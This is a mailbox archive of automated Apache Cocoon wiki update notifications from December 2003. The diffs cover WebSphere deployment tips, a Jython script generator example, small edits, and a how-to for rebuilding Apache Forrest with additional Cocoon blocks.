<[email protected]>; Thu, 18 Dec 2003 16:00:02 +0100 Date: Thu, 18 Dec 2003 16:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WebSphereV5.0Deployment Thu Dec 18 16:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WebSphereV5.0Deployment , version: 9 on Thu Dec 18 15:09:52 2003 by AlexandreVictoor + These tips work also for Cocoon 2.1 . I had just a problem with the apache axis stuffs, do not know why. I just removed axis from cocoon.xconf and everything else seem to work fine. + From [email protected] Thu Dec 18 16:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42507 invoked from network); 18 Dec 2003 16:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Dec 2003 16:00:10 -0000 Received: (qmail 48174 invoked by uid 500); 18 Dec 2003 16:00:03 -0000 Delivered-To: [email protected] Received: (qmail 48145 invoked by uid 500); 18 Dec 2003 16:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48131 invoked from network); 18 Dec 2003 16:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 18 Dec 2003 16:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBIG03O04739 for <[email protected]>; Thu, 18 Dec 2003 17:00:04 +0100 Date: Thu, 18 Dec 2003 17:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WebSphereV5.0Deployment Thu Dec 18 17:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WebSphereV5.0Deployment , version: 10 on Thu Dec 18 15:12:39 2003 by AlexandreVictoor - These tips work also for Cocoon 2.1 . I had just a problem with the apache axis stuffs, do not know why. I just removed axis from cocoon.xconf and everything else seem to work fine. + These tips work also for Cocoon 2.1 . I had just a problem with the apache axis stuffs, do not know why. I just removed axis from cocoon.xconf and everything else seem to work fine. --[AlexandreVictoor] ? +++++++++++++++++++++ From [email protected] Thu Dec 18 17:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78155 invoked from network); 18 Dec 2003 17:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Dec 2003 17:00:09 -0000 Received: (qmail 87207 invoked by uid 500); 18 Dec 2003 17:00:01 -0000 Delivered-To: [email protected] Received: (qmail 87175 invoked by uid 500); 18 Dec 2003 17:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87137 invoked from network); 18 Dec 2003 17:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 18 Dec 2003 17:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBIH03O04766 for <[email protected]>; Thu, 18 Dec 2003 18:00:03 +0100 Date: Thu, 18 Dec 2003 18:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] XSPTransformCustomDate Thu Dec 18 18:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=XSPTransformCustomDate , version: 6 on Thu Dec 18 16:34:52 2003 by 161.129.204.104 - <request>date.xml?date=<xsp:expr>date_one</xsp:expr> ? ^ + <request>date.xml?sDate=<xsp:expr>date_one</xsp:expr> ? ^^ From [email protected] Fri Dec 19 05:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95157 invoked from network); 19 Dec 2003 05:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 19 Dec 2003 05:00:16 -0000 Received: (qmail 90294 invoked by uid 500); 19 Dec 2003 04:59:55 -0000 Delivered-To: [email protected] Received: (qmail 90267 invoked by uid 500); 19 Dec 2003 04:59:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90256 invoked from network); 19 Dec 2003 04:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 19 Dec 2003 04:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBJ504O05402 for <[email protected]>; Fri, 19 Dec 2003 06:00:05 +0100 Date: Fri, 19 Dec 2003 06:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] GT2003Hackathon Fri Dec 19 06:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=GT2003Hackathon , version: 100 on Fri Dec 19 04:18:32 2003 by 161.129.204.104 + Hello , lemoned + From [email protected] Fri Dec 19 07:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80076 invoked from network); 19 Dec 2003 07:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 19 Dec 2003 07:00:15 -0000 Received: (qmail 89381 invoked by uid 500); 19 Dec 2003 06:59:53 -0000 Delivered-To: [email protected] Received: (qmail 89250 invoked by uid 500); 19 Dec 2003 06:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89239 invoked from network); 19 Dec 2003 06:59:52 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 19 Dec 2003 06:59:52 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBJ702O05452 for <[email protected]>; Fri, 19 Dec 2003 08:00:03 +0100 Date: Fri, 19 Dec 2003 08:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] GT2003Hackathon Fri Dec 19 08:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=GT2003Hackathon , version: 101 on Fri Dec 19 06:42:32 2003 by BertrandDelacretaz - Hello , lemoned From [email protected] Fri Dec 19 12:00:14 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76971 invoked from network); 19 Dec 2003 12:00:14 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 19 Dec 2003 12:00:14 -0000 Received: (qmail 71395 invoked by uid 500); 19 Dec 2003 12:00:05 -0000 Delivered-To: [email protected] Received: (qmail 71360 invoked by uid 500); 19 Dec 2003 12:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71284 invoked from network); 19 Dec 2003 12:00:04 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 19 Dec 2003 12:00:04 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBJC03O05637 for <[email protected]>; Fri, 19 Dec 2003 13:00:03 +0100 Date: Fri, 19 Dec 2003 13:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Snippets PythonScriptGenerator Fri Dec 19 13:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Snippets , version: 29 on Fri Dec 19 12:08:13 2003 by LaurentMauron + + !Custom generator in Python + See [PythonScriptGenerator] Page: http://wiki.cocoondev.org/Wiki.jsp?page=PythonScriptGenerator , version: 1 on Fri Dec 19 12:11:15 2003 by LaurentMauron New page created: + #Download and copy jython.jar in web-inf directory. + #Sitemap pipeline: + {{{<map:match pattern="test.py"> + <map:generate src="test.py" type="script"> + <map:parameter name="key" value="Shark Attack"/> + </map:generate> + <map:serialize type="xml"/> + </map:match>}}} + #Python script: + {{{import os + + #get the output String buffer + output = bsf.lookupBean( "output" ) + + #get the Parameters object + parameters = bsf.lookupBean("parameters") + + + #get the value of the parameter "key" defined in the sitemap + value = parameters.getParameter("key") + + #generate xml + output.append("<msg>" + value +"</msg>")}}} + From [email protected] Fri Dec 19 13:00:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21755 invoked from network); 19 Dec 2003 13:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 19 Dec 2003 13:00:07 -0000 Received: (qmail 55182 invoked by uid 500); 19 Dec 2003 13:00:04 -0000 Delivered-To: [email protected] Received: (qmail 55151 invoked by uid 500); 19 Dec 2003 13:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55140 invoked from network); 19 Dec 2003 13:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 19 Dec 2003 13:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBJD03O05668 for <[email protected]>; Fri, 19 Dec 2003 14:00:03 +0100 Date: Fri, 19 Dec 2003 14:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Snippets PythonScriptGenerator Fri Dec 19 14:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Snippets , version: 29 on Fri Dec 19 12:08:13 2003 by LaurentMauron + + !Custom generator in Python + See [PythonScriptGenerator] Page: http://wiki.cocoondev.org/Wiki.jsp?page=PythonScriptGenerator , version: 1 on Fri Dec 19 12:11:15 2003 by LaurentMauron New page created: + #Download and copy jython.jar in web-inf directory. + #Sitemap pipeline: + {{{<map:match pattern="test.py"> + <map:generate src="test.py" type="script"> + <map:parameter name="key" value="Shark Attack"/> + </map:generate> + <map:serialize type="xml"/> + </map:match>}}} + #Python script: + {{{import os + + #get the output String buffer + output = bsf.lookupBean( "output" ) + + #get the Parameters object + parameters = bsf.lookupBean("parameters") + + + #get the value of the parameter "key" defined in the sitemap + value = parameters.getParameter("key") + + #generate xml + output.append("<msg>" + value +"</msg>")}}} + From [email protected] Sat Dec 20 02:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81987 invoked from network); 20 Dec 2003 02:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Dec 2003 02:00:13 -0000 Received: (qmail 16427 invoked by uid 500); 20 Dec 2003 01:59:56 -0000 Delivered-To: [email protected] Received: (qmail 16398 invoked by uid 500); 20 Dec 2003 01:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16387 invoked from network); 20 Dec 2003 01:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 20 Dec 2003 01:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBK203O06031 for <[email protected]>; Sat, 20 Dec 2003 03:00:03 +0100 Date: Sat, 20 Dec 2003 03:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] PythonScriptGenerator Sat Dec 20 03:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=PythonScriptGenerator , version: 2 on Sat Dec 20 01:41:45 2003 by 161.129.204.104 - {{{import os + {{{ From [email protected] Sat Dec 20 10:00:21 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92113 invoked from network); 20 Dec 2003 10:00:21 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Dec 2003 10:00:21 -0000 Received: (qmail 80576 invoked by uid 500); 20 Dec 2003 09:59:52 -0000 Delivered-To: [email protected] Received: (qmail 80549 invoked by uid 500); 20 Dec 2003 09:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 80538 invoked from network); 20 Dec 2003 09:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 20 Dec 2003 09:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBKA04O06580 for <[email protected]>; Sat, 20 Dec 2003 11:00:04 +0100 Date: Sat, 20 Dec 2003 11:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] ApacheModProxy SantiagoGala Sat Dec 20 11:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=ApacheModProxy , version: 30 on Sat Dec 20 09:26:26 2003 by SantiagoGala + - it's even slightly slower), but {{mod_proxy}} is way to crummy, it's either "in" + it's even slightly slower), but {{mod_proxy}} is way too crummy, it's either "in" ? + + Page: http://wiki.cocoondev.org/Wiki.jsp?page=SantiagoGala , version: 4 on Sat Dec 20 09:28:46 2003 by SantiagoGala + Member of the [ASF|http://www.apache.org/foundation/], commiter in Apache - Committer in Apache Jakarta's [Jetspeed|http://jakarta.apache.org/jetspeed] project. ? ------------------- + Jakarta's [Jetspeed|http://jakarta.apache.org/jetspeed] project. From [email protected] Sat Dec 20 14:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53210 invoked from network); 20 Dec 2003 14:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Dec 2003 14:00:08 -0000 Received: (qmail 44566 invoked by uid 500); 20 Dec 2003 14:00:05 -0000 Delivered-To: [email protected] Received: (qmail 44410 invoked by uid 500); 20 Dec 2003 14:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44395 invoked from network); 20 Dec 2003 14:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 20 Dec 2003 14:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBKE03O06676 for <[email protected]>; Sat, 20 Dec 2003 15:00:04 +0100 Date: Sat, 20 Dec 2003 15:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] TheyLikeCocoon JasonGorman Sat Dec 20 15:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=TheyLikeCocoon , version: 16 on Sat Dec 20 13:15:29 2003 by 161.129.204.104 + * I've only been using it for a few weeks and I'm already impressed by how easy it is to use compared to similar frameworks -- [Jason Gorman] + Page: http://wiki.cocoondev.org/Wiki.jsp?page=JasonGorman , version: 1 on Sat Dec 20 13:19:27 2003 by 161.129.204.104 New page created: + OO developer, trainer and author. writer of many a free [UML tutorial|http://www.parlezuml.com] and editor of the infamous [ObjectMonkey|http://www.objectmonkey.com] e-zine - kinda like SD Magazine with Tourettes. + From [email protected] Sun Dec 21 01:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21036 invoked from network); 21 Dec 2003 01:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 21 Dec 2003 01:00:12 -0000 Received: (qmail 24342 invoked by uid 500); 21 Dec 2003 00:59:56 -0000 Delivered-To: [email protected] Received: (qmail 24313 invoked by uid 500); 21 Dec 2003 00:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24302 invoked from network); 21 Dec 2003 00:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 21 Dec 2003 00:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBL102O06936 for <[email protected]>; Sun, 21 Dec 2003 02:00:03 +0100 Date: Sun, 21 Dec 2003 02:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] AddingXSPToForrest Sun Dec 21 02:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=AddingXSPToForrest , version: 18 on Sun Dec 21 00:42:16 2003 by 161.129.204.104 - Next we have to tell Forrest what kind of build we are performing, we want to perform a real build so make sure the following is true:\\ + Next we have to tell Forrest what kind of build we are performing.Performing a "real" build copies upgraded jars to their official lib/* locations, and 'cvs + add's them, if you are not a commiter to Forrest you will not be able to CVS add them. If you are a commiter you best be very sure that you actually want to upgrade Cocoon with the blocks you have added. In most cases you will only want to upgrade your local copy. To do this we want to do a "test" build. The problem with this is that the upgrade is only done in your build directory and so each time you rebuild forrest your upgrade will be blown away - consider copying your custom build of Cocoon somewhere wafe so you can easily copy it back into place if you rebuild Forrest. - {{{UPGRADE_TYPE=real + {{{#UPGRADE_TYPE=real ? + - #UPGRADE_TYPE=testing}}} ? - + UPGRADE_TYPE=testing}}} From [email protected] Sun Dec 21 21:58:33 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3518 invoked from network); 21 Dec 2003 21:58:33 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 21 Dec 2003 21:58:33 -0000 Received: (qmail 62009 invoked by uid 500); 21 Dec 2003 18:00:01 -0000 Delivered-To: [email protected] Received: (qmail 61848 invoked by uid 500); 21 Dec 2003 18:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61834 invoked from network); 21 Dec 2003 17:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 21 Dec 2003 17:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBLI02O14433 for <[email protected]>; Sun, 21 Dec 2003 19:00:02 +0100 Date: Sun, 21 Dec 2003 19:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Links Sun Dec 21 19:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Links , version: 66 on Sun Dec 21 17:42:59 2003 by ReinhardPoetz + * [Professional XML Development with Apache Tools : Xerces, Xalan, FOP, Cocoon, Axis, Xindice|http://www.amazon.com/exec/obidos/ASIN/0764543555/103-0053732-9718251] by Theodore W. Leung From [email protected] Sun Dec 21 22:08:24 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13866 invoked from network); 21 Dec 2003 22:08:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 21 Dec 2003 22:08:13 -0000 Received: (qmail 87787 invoked by uid 500); 21 Dec 2003 02:59:56 -0000 Delivered-To: [email protected] Received: (qmail 87760 invoked by uid 500); 21 Dec 2003 02:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87746 invoked from network); 21 Dec 2003 02:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 21 Dec 2003 02:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBL303O06986 for <[email protected]>; Sun, 21 Dec 2003 04:00:04 +0100 Date: Sun, 21 Dec 2003 04:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] AddingXSPToForrest AddingCocoonBlocksToForrest Sun Dec 21 04:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=AddingXSPToForrest , version: 19 on Sun Dec 21 02:39:09 2003 by 161.129.204.104 - __Custom blocks in Forrest__ \\ + Version 0.6-dev of Forrest includes XSP, however this document is still useful as a How-To on rebuilding forrest with a different version of Cocoon which may have different blocks compiled in. - This how-to is useful for all those that wish to build Forrest version 0.5 with blocks that are not part of the default Forrest build. For example XSP, XMLDB or XMLForm etc... In this how-to we will show how to build XSP into Forrest.\\ + This document has therefor been moved to [Adding Cocoon Blocks To Forrest] - Why do this? Well Forrest has a lot of features that are great, it's a fantastic way to quickly create and manage a project. It would be nice though to able to extend Forrest.\\ - - \\ - __So let's start:__\\ - - Firstly make sure that you have Forrest 0.5 distribution and the CVS distribution of Cocoon-2.1, Nekodtd and Nekopull. If you're unsure about CVS go [here | http://xml.apache.org/cvs.html] and you can get Nekodtd and Nekopull from here:\\ - - [http://www.apache.org/~andyc/neko/nekodtd-latest.tar.gz]\\ - [http://www.apache.org/~andyc/neko/nekopull-latest.tar.gz]\\ - - Having downloaded and extracted everything you should now have a folder with all these distributions in it, it is important that these live on the same level or there be more editing to do.\\ - - \\ - __local.blocks.properties__ - - Now we need to copy the local.blocks.properties file from Forrest to Cocoon, in terminal:\\ - - {{{g4% sudo cp xml-forrest/etc/cocoon_upgrade/local.blocks.properties ../cocoon-2.1/local.blocks.properties}}} - - Next edit this file to include all the blocks that you want to build into Forrest. This is done by un-commenting all the required blocks.\\ - - Next we build Cocoon: - - {{{g4% cocoon-2.1/build.sh}}} - - \\ - __upgrade_cocoon_jars.sh__ - - Once Cocoon has been built we can edit ''xml-forrest/etc/cocoon_upgrade/upgrade_cocoon_jars.sh''. - Open this file in your editor. Firstly make sure that your paths to Cocoon, Forrest and Neko* are right, if they all live on the same directory level you should be fine. Make sure that NEKODTD_VERSION and NEKOPULL_VERSION are reflecting the version you downloaded. - - {{{BASE=$PWD/`dirname $0` - ## MUST BE OVERRIDDEN: - COCOON=$BASE/../../../cocoon-2.1 - FORREST=$BASE/../.. - NEKODTD_VERSION=0.1.6 - NEKODTD_HOME=$BASE/../../../nekodtd-$NEKODTD_VERSION - NEKOPULL_VERSION=0.2.3 - NEKOPULL_HOME=$BASE/../../../nekopull-$NEKOPULL_VERSION}}} - - Next we have to tell Forrest what kind of build we are performing.Performing a "real" build copies upgraded jars to their official lib/* locations, and 'cvs - add's them, if you are not a commiter to Forrest you will not be able to CVS add them. If you are a commiter you best be very sure that you actually want to upgrade Cocoon with the blocks you have added. In most cases you will only want to upgrade your local copy. To do this we want to do a "test" build. The problem with this is that the upgrade is only done in your build directory and so each time you rebuild forrest your upgrade will be blown away - consider copying your custom build of Cocoon somewhere wafe so you can easily copy it back into place if you rebuild Forrest. - - {{{#UPGRADE_TYPE=real - UPGRADE_TYPE=testing}}} - - Finally we want to tell Forrest what blocks we want, remember you have to have built them in Cocoon first or they won't be there. For example if we want to include the Sessions block we include it like so: - - {{{bzcopy session-fw - #cocoon-session-fw-block.jar}}} - - Importantly for XSP to work in Forrest we must also include\\ - - {{{copy jdtcore - #jdtcore-2.1.0jar}}} - - Next in terminal run ''xml-forrest/etc/cocoon_upgrade/upgrade_cocoon_jars.sh'', this can take a while. - - {{{g4% xml-forrest/etc/cocoon_upgrade/upgrade_cocoon_jars.sh}}} - - Now you are ready to build Forrest: - - {{{g4% xml-forrest/build.sh}}} - - You can now create a Forrest project and seed it and it will now have any of the blocks that you've requested. This method should be able to build any block into Forrest, just make sure that the block you require does not have additional dependencies. - - Lastly to make XSP available to the sitemap, in my-project/sitemap.xmap add the following generator - - {{{<map:generator name="serverpages" pool-grow="2" pool-max="32" pool-min="4" src="org.apache.cocoon.generation.ServerPagesGenerator"/>}}} - - __N.B__: Sometimes Forrest will not build because it loses the forrest.build.xml (''xml-forrest/build.dist/shbat/forrest.build.xml'') If you already have a copy of this save it so you can use it later if needed. Also the same seems to happen sometimes with jing-*.jar (''xml-forrest/lib/core/jing-*.jar''), if this happens you can grab this jar from the Forrest CVS site. - - __N.B__: Forrest 0.6-dev provides XSP support. - Page: http://wiki.cocoondev.org/Wiki.jsp?page=AddingCocoonBlocksToForrest , version: 1 on Sun Dec 21 02:41:15 2003 by 161.129.204.104 New page created: + __Custom blocks in Forrest__ \\ + + This how-to is useful for all those that wish to build Forrest version 0.5+ with blocks that are not part of the default Forrest build. For example XSP, XMLDB or XMLForm etc... In this how-to we will show how to build XSP into Forrest (NB as of 0.6-dev XSP is included with Forrest, however, this is still a useful How-To).\\ + + Why do this? Well Forrest has a lot of features that are great, it's a fantastic way to quickly create and manage a project. It would be nice though to able to extend Forrest.\\ + + \\ + __So let's start:__\\ + + Firstly make sure that you have Forrest 0.5 distribution and the CVS distribution of Cocoon-2.1, Nekodtd and Nekopull. If you're unsure about CVS go [here | http://xml.apache.org/cvs.html] and you can get Nekodtd and Nekopull from here:\\ + + [http://www.apache.org/~andyc/neko/nekodtd-latest.tar.gz]\\ + [http://www.apache.org/~andyc/neko/nekopull-latest.tar.gz]\\ + + Having downloaded and extracted everything you should now have a folder with all these distributions in it, it is important that these live on the same level or there be more editing to do.\\ + + \\ + __local.blocks.properties__ + + Now we need to copy the local.blocks.properties file from Forrest to Cocoon, in terminal:\\ + + {{{g4% sudo cp xml-forrest/etc/cocoon_upgrade/local.blocks.properties ../cocoon-2.1/local.blocks.properties}}} + + Next edit this file to include all the blocks that you want to build into Forrest. This is done by un-commenting all the required blocks.\\ + + Next we build Cocoon: + + {{{g4% cocoon-2.1/build.sh}}} + + \\ + __upgrade_cocoon_jars.sh__ + + Once Cocoon has been built we can edit ''xml-forrest/etc/cocoon_upgrade/upgrade_cocoon_jars.sh''. + Open this file in your editor. Firstly make sure that your paths to Cocoon, Forrest and Neko* are right, if they all live on the same directory level you should be fine. Make sure that NEKODTD_VERSION and NEKOPULL_VERSION are reflecting the version you downloaded. + + {{{BASE=$PWD/`dirname $0` + ## MUST BE OVERRIDDEN: + COCOON=$BASE/../../../cocoon-2.1 + FORREST=$BASE/../.. + NEKODTD_VERSION=0.1.6 + 